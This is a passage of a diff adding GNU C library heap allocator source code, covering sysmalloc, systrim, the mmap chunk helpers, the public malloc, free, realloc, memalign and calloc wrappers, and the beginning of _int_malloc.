+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          arena_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          arena_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+                      chunk_at_offset (old_top, old_size)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
+                        (2 * SIZE_SZ) | PREV_INUSE;
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - p->prev_size;
+  size_t total_size = p->prev_size + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = p->prev_size;
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert ((p->prev_size == offset));
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* see if the dynamic brk/mmap threshold needs adjusting */
+      if (!mp_.no_dyn_threshold
+          && p->size > mp_.mmap_threshold
+          && p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    ar_ptr = arena_for_chunk (oldp);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+      || __builtin_expect (misaligned_chunk (oldp), 0))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  (void) mutex_lock (&ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  (void) mutex_unlock (&ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    (void) mutex_unlock (&av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      do
+        {
+          victim = pp;
+          if (victim == NULL)
+            break;
+        }
+      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
+             != victim);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+	if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
